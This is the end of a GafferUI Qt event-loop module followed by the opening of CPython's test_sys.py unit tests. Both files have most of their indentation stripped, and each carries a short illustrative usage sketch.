assert( QtCore.QThread.currentThread() == EventLoop.__qtApplication.thread() )
if cls.__idleTimer is None :
cls.__idleTimer = QtCore.QTimer( cls.__qtApplication )
cls.__idleTimer.timeout.connect( cls.__qtIdleCallback )
if not cls.__idleTimer.isActive() :
cls.__idleTimer.start()
# This is a staticmethod rather than a classmethod because PySide 1.0.5
# doesn't support classmethods as slots.
@staticmethod
def __qtIdleCallback() :
assert( QtCore.QThread.currentThread() == EventLoop.__qtApplication.thread() )
GafferUI.Gadget.idleSignal()()
for c in EventLoop.__idleCallbacks[:] : # slice takes copy, so we can remove during iteration
try :
if not c() :
EventLoop.__idleCallbacks.remove( c )
except Exception :
# if the callback throws then we remove it anyway, because
# we don't want to keep invoking the same error over and over.
EventLoop.__idleCallbacks.remove( c )
# report the error
IECore.msg( IECore.Msg.Level.Error, "EventLoop.__qtIdleCallback", traceback.format_exc() )
if len( EventLoop.__idleCallbacks )==0 and GafferUI.Gadget.idleSignal().empty() :
EventLoop.__idleTimer.stop()
@classmethod
def _gadgetIdleSignalAccessed( cls ) :
# It would be an error to access the idle signal from anything but the main
# thread, because it would imply multiple threads fighting over the same signal.
assert( QtCore.QThread.currentThread() == EventLoop.__qtApplication.thread() )
cls.__ensureIdleTimer()
def __pumpThreadFn( self ) :
import maya.utils
while 1 :
time.sleep( 0.01 )
maya.utils.executeDeferred( self.__pump )
def __pump( self, thrusts=1 ) :
for thrust in range( 0, thrusts ) :
self.__qtEventLoop.processEvents()
_gadgetIdleSignalAccessedConnection = GafferUI.Gadget._idleSignalAccessedSignal().connect( EventLoop._gadgetIdleSignalAccessed )
class _UIThreadExecutor( QtCore.QObject ) :
executeEventType = QtCore.QEvent.registerEventType()
__instances = set()
def __init__( self, callable, resultCondition = None ) :
QtCore.QObject.__init__( self )
self.__callable = callable
self.__resultCondition = resultCondition
# we store a reference to ourselves in __instances, as otherwise we would
# go out of scope and be deleted at the end of executeOnUIThread above.
# that's bad because we would never live long enough to receive our event,
# and we would also be deleted from the calling thread rather than the ui
# thread where we live.
self.__instances.add( self )
def event( self, event ) :
if event.type() == self.executeEventType :
result = self.__callable()
if self.__resultCondition is not None :
self.__resultCondition.acquire()
self.__resultCondition.resultValue = result
self.__resultCondition.notify()
self.__resultCondition.release()
self.__instances.remove( self )
return True
return False
# Service the requests made to `ParallelAlgo::callOnUIThread()`.
Gaffer.ParallelAlgo.callOnUIThreadSignal().connect( EventLoop.executeOnUIThread, scoped = False )
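# --- Illustrative usage sketch (not part of the original module) ---
# A minimal example, under stated assumptions, of how the idle-callback and
# cross-thread APIs defined above might be used. `updateStatus` stands in for
# hypothetical widget code; a real application would do actual UI work there.
def _exampleEventLoopUsage() :

    runs = [ 0 ]
    def idleCallback() :
        # returning True keeps the callback registered, False removes it
        runs[0] += 1
        return runs[0] < 3

    EventLoop.addIdleCallback( idleCallback )

    def updateStatus() :
        # hypothetical widget manipulation - must run on the UI thread
        pass

    def worker() :
        # queue the callable for the main thread; waitForResult=True blocks
        # this worker until the main thread has executed it
        EventLoop.executeOnUIThread( updateStatus, waitForResult=True )

    threading.Thread( target=worker ).start()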
|
test_sys.py
|
import unittest, test.support
from test.support.script_helper import assert_python_ok, assert_python_failure
import sys, io, os
import struct
import subprocess
import textwrap
import warnings
import operator
import codecs
import gc
import sysconfig
import locale
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
try:
import threading
except ImportError:
threading = None
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
test.support.reap_children()
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (10, 25, 50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
self.assertRaises(RecursionError, f)
self.assertRaises(RecursionError, f)
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than the "lower-water
# mark". Otherwise, it may not be possible anymore to
# reset the overflowed flag to 0.
from _testcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
# formula extracted from _Py_RecursionLimitLowerWaterMark()
if limit > 200:
depth = limit - 50
else:
depth = limit * 3 // 4
set_recursion_limit_at_depth(depth, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RecursionError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import _thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.support.reap_threads
def current_frames_with_threads(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
@unittest.skipUnless(hasattr(sys, 'thread_info'),
'Threading required for this test.')
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global numruns
numruns += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(numruns)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization", "isolated")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = "C"
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def test_c_locale_surrogateescape(self):
out = self.c_locale_get_error_handler(isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# has no effect
out = self.c_locale_get_error_handler(encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
# Some sanity checks
with_pymalloc = sysconfig.get_config_var('WITH_PYMALLOC')
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While one could imagine a Python session where the number of
# allocated blocks exceeds the total reference count (e.g. many
# buffer objects sharing few references), it is unlikely to
# happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
@test.support.requires_type_collecting
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
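# --- Illustrative sketch (not part of the test suite) ---
# The hash modulus check in test_attributes() above relies on Fermat's little
# theorem: for a prime p and any x not divisible by p, pow(x, p - 1, p) == 1.
# Below is a hypothetical standalone version of that probable-primality test;
# like the in-test loop, it does not rule out Carmichael numbers.
def _is_probable_prime(p, witnesses=range(2, 100)):
    return all(pow(x, p - 1, p) == 1 for x in witnesses if x % p)

# For example, 2**61 - 1, the Mersenne prime used as sys.hash_info.modulus on
# 64-bit builds, passes the check.
assert _is_probable_prime(2**61 - 1)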
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('4P')) # XXX check layout
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
